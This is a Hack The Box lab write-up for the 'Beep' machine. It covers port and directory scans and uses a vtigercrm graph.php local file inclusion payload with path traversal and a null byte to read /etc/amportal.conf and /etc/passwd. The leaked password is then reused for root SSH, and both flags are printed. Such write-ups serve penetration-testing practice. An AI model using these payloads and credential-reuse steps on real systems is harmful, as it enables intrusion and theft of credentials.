Beep Write-Up

Machine IP - 10.10.10.7

Initial Phase

Starting with an initial scan of nmap, we get the following -

root@kali:~/Desktop/Hack The Box/beep# nmap -F 10.10.10.7 Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-10 17:45 +04 Nmap scan report for 10.10.10.7 Host is up (0.22s latency). Not shown: 89 closed ports PORT STATE SERVICE 22/tcp open ssh 25/tcp open smtp 80/tcp open http 110/tcp open pop3 111/tcp open rpcbind 143/tcp open imap 443/tcp open https 993/tcp open imaps 995/tcp open pop3s 3306/tcp open mysql 10000/tcp open snet-sensor-mgmt Nmap done: 1 IP address (1 host up) scanned in 1.32 seconds

The detailed nmap scan reveals -

root@kali:~/Desktop/Hack The Box/beep# nmap -p- -sC -T5 10.10.10.7 Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-10 17:45 +04 Warning: 10.10.10.7 giving up on port because retransmission cap hit (2). Stats: 0:08:02 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan SYN Stealth Scan Timing: About 90.63% done; ETC: 17:54 (0:00:50 remaining) Nmap scan report for 10.10.10.7 Host is up (0.22s latency). Not shown: 65519 closed ports PORT STATE SERVICE 22/tcp open ssh | ssh-hostkey: | 1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA) |_ 2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA) 25/tcp open smtp |_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 80/tcp open http |_http-title: Did not follow redirect to https://10.10.10.7/ 110/tcp open pop3 |_pop3-capabilities: UIDL RESP-CODES IMPLEMENTATION(Cyrus POP3 server v2) APOP LOGIN-DELAY(0) TOP EXPIRE(NEVER) PIPELINING AUTH-RESP-CODE STLS USER 111/tcp open rpcbind | rpcinfo: | program version port/proto service | 100000 2 111/tcp rpcbind | 100000 2 111/udp rpcbind | 100024 1 744/udp status |_ 100024 1 747/tcp status 143/tcp open imap |_imap-capabilities: Completed IMAP4rev1 THREAD=ORDEREDSUBJECT QUOTA STARTTLS NO SORT LISTEXT MULTIAPPEND URLAUTHA0001 BINARY MAILBOX-REFERRALS IMAP4 OK ID X-NETSCAPE NAMESPACE IDLE CATENATE CONDSTORE LITERAL+ UNSELECT ACL ANNOTATEMORE THREAD=REFERENCES ATOMIC RIGHTS=kxte CHILDREN LIST-SUBSCRIBED RENAME SORT=MODSEQ UIDPLUS 443/tcp open https |_ssl-date: 2019-05-10T10:50:00+00:00; -3h05m16s from scanner time. 747/tcp open status 993/tcp open imaps |_imap-capabilities: CAPABILITY 995/tcp open pop3s 3306/tcp open mysql |_mysql-info: ERROR: Script execution failed (use -d to debug) 4190/tcp open sieve 4445/tcp open upnotifyp 4559/tcp open hylafax 5038/tcp open unknown 10000/tcp open snet-sensor-mgmt Host script results: |_clock-skew: mean: -3h05m16s, deviation: 0s, median: -3h05m16s Nmap done: 1 IP address (1 host up) scanned in 787.48 seconds

The directory buster reveals following results -

root@kali:~/Desktop/Hack The Box/beep# gobuster -k -u https://10.10.10.7:443/ -w /usr/share/seclists/Discovery/Web-Content/raft-small-directories.txt -f ===================================================== Gobuster v2.0.1 OJ Reeves (@TheColonial) ===================================================== [+] Mode : dir [+] Url/Domain : https://10.10.10.7:443/ [+] Threads : 10 [+] Wordlist : /usr/share/seclists/Discovery/Web-Content/raft-small-directories.txt [+] Status codes : 200,204,301,302,307,403 [+] Add Slash : true [+] Timeout : 10s ===================================================== 2019/05/10 22:19:52 Starting gobuster ===================================================== /cgi-bin/ (Status: 403) /admin/ (Status: 302) /modules/ (Status: 200) /images/ (Status: 200) /themes/ (Status: 200) /help/ (Status: 200) /error/ (Status: 403) /var/ (Status: 200) /mail/ (Status: 200) /static/ (Status: 200) /lang/ (Status: 200) /libs/ (Status: 200) /panel/ (Status: 200) /icons/ (Status: 200) /configs/ (Status: 200) /mailman/ (Status: 403) /pipermail/ (Status: 200) /recordings/ (Status: 200) /vtigercrm/ (Status: 200) ===================================================== 2019/05/10 22:50:42 Finished =====================================================

Exploit Phase

Now that we have all directories, navigating to the IP on the browser first shows an elastix login page. Upon trying to enumerate version, we find nothing much is revealed easily. Also, looking at all the directories one by one, we find that there is a login page related with vtigercrm, admin and recordings. Searching via searchsploit and online for all the four things we discovered, we find an LFI for elastix, LFI for vtiger, RCE with the recordings and freepbx system. Therefore, we can start following through with all the potential attack vectors. Starting with the elastix LFI, even without the version number, because the exploit is tiny -

root@kali:~/Desktop/Hack The Box/beep# searchsploit elastix ------------------------------------------------------------------------------- ---------------------------------------- Exploit Title | Path | (/usr/share/exploitdb/) ------------------------------------------------------------------------------- ---------------------------------------- Elastix - 'page' Cross-Site Scripting | exploits/php/webapps/38078.py Elastix - Multiple Cross-Site Scripting Vulnerabilities | exploits/php/webapps/38544.txt Elastix 2.0.2 - Multiple Cross-Site Scripting Vulnerabilities | exploits/php/webapps/34942.txt Elastix 2.2.0 - 'graph.php' Local File Inclusion | exploits/php/webapps/37637.pl Elastix 2.x - Blind SQL Injection | exploits/php/webapps/36305.txt Elastix < 2.5 - PHP Code Injection | exploits/php/webapps/38091.php FreePBX 2.10.0 / Elastix 2.2.0 - Remote Code Execution | exploits/php/webapps/18650.py ------------------------------------------------------------------------------- ---------------------------------------- Shellcodes: No Result

The XSS and remote code execution don't seem of interest as XSS is after user accounts and the RCE has a version of freepbx higher than the one used on this machine. Trying with the next best thing, which is the local file inclusion, we see that the exploit is as follows -

/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action

Therefore, prepending the IP and https before the exploit, we get a list of items like -

# This file is part of FreePBX. # # FreePBX is free software: you can redistribute it and/or modify ................. ................. # along with FreePBX. If not, see <http://www.gnu.org/licenses/>. # # This file contains settings for components of the Asterisk Management Portal # Spaces are not allowed! # Run /usr/src/AMP/apply_conf.sh after making changes to this file # FreePBX Database configuration # AMPDBHOST: Hostname where the FreePBX database resides # AMPDBENGINE: Engine hosting the FreePBX database (e.g. mysql) # AMPDBNAME: Name of the FreePBX database (e.g. asterisk) # AMPDBUSER: Username used to connect to the FreePBX database # AMPDBPASS: Password for AMPDBUSER (above) # AMPENGINE: Telephony backend engine (e.g. asterisk) # AMPMGRUSER: Username to access the Asterisk Manager Interface # AMPMGRPASS: Password for AMPMGRUSER # AMPDBHOST=localhost AMPDBENGINE=mysql .................... ....................

This file has a lot of commented lines, so we save the output in a file and print only the non-commented lines using grep -

root@kali:~/Desktop/Hack The Box/beep# cat amportal_file | grep -vE "^#.*" | grep -vE "^$" AMPDBHOST=localhost AMPDBENGINE=mysql AMPDBUSER=asteriskuser AMPDBPASS=jEhdIekWmdjE AMPENGINE=asterisk AMPMGRUSER=admin AMPMGRPASS=jEhdIekWmdjE AMPBIN=/var/lib/asterisk/bin AMPSBIN=/usr/local/sbin AMPWEBROOT=/var/www/html AMPCGIBIN=/var/www/cgi-bin FOPWEBROOT=/var/www/html/panel FOPPASSWORD=jEhdIekWmdjE ARI_ADMIN_USERNAME=admin ARI_ADMIN_PASSWORD=jEhdIekWmdjE AUTHTYPE=database AMPADMINLOGO=logo.png AMPEXTENSIONS=extensions ENABLECW=no ZAP2DAHDICOMPAT=true MOHDIR=mohmp3 AMPMODULEXML=http://mirror.freepbx.org/ AMPMODULESVN=http://mirror.freepbx.org/modules/ AMPDBNAME=asterisk ASTETCDIR=/etc/asterisk ASTMODDIR=/usr/lib/asterisk/modules ASTVARLIBDIR=/var/lib/asterisk ASTAGIDIR=/var/lib/asterisk/agi-bin ASTSPOOLDIR=/var/spool/asterisk ASTRUNDIR=/var/run/asterisk ASTLOGDIR=/var/log/asteriskSorry! Attempt to access restricted file.

Searching ARI, we know its some interface for the freepbx. Therefore, these can be credentials for something. Looking at the file, we see all passwords are mainly jEhdIekWmdjE. The usernames in the file are asterisk and admin. Therefore, we have two usernames and one password as of now. Using the LFI for /etc/passwd -

https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/passwd%00&module=Accounts&action

This gives us the etc/passwd file and now we can again save the output to a file and get only the usernames of valid users by grepping the ones that end with bash and then cutting to give only the usernames -

root@kali:~/Desktop/Hack The Box/beep# cat passwd_file | grep -E ".*bash$" | cut -d":" -f1 root mysql cyrus asterisk spamfilter fanis

We now have a list of usernames and just one password, so just trying the credentials on possible places would lead to something. Trying the first combo, we have root and jEhdIekWmdjE for ssh and we do get root -

root@kali:~/Desktop/Hack The Box/beep# ssh root@10.10.10.7 root@10.10.10.7's password: Last login: Sat May 11 07:00:25 2019 from 10.10.14.68 Welcome to Elastix ---------------------------------------------------- To access your Elastix System, using a separate workstation (PC/MAC/Linux) Open the Internet Browser using the following URL: http://10.10.10.7 [root@beep ~]# whoami root [root@beep ~]# ls anaconda-ks.cfg install.log postnochroot webmin-1.570-1.noarch.rpm elastix-pr-2.2-1.i386.rpm install.log.syslog root.txt [root@beep ~]# pwd /root [root@beep ~]# cat root.txt d88e006123842106982acce0aaf453f0 [root@beep ~]# cd ../home [root@beep home]# ls fanis spamfilter [root@beep home]# cd fanis [root@beep fanis]# ls user.txt [root@beep fanis]# cat user.txt aeff3def0c765c2677b94715cffa73ac

Thus, we have the user and root flags.